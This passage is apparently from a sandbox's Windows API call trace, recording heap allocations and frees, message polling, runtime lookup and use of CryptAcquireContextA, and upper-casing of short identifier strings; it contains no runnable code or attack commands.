[0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0261.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0261.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.976] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0261.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0261.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0261.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.977] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0261.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0261.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.977] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0261.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0261.981] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0261.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0261.982] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.982] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0261.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0261.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0261.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.983] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0261.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.984] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0261.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.984] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.984] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.985] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.985] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.985] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.986] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.986] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0261.986] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.986] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0261.986] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.986] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.986] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.987] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.987] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0261.987] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0261.987] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.987] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0261.987] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.987] CharUpperBuffW (in: lpsz="SSA4E00301934", 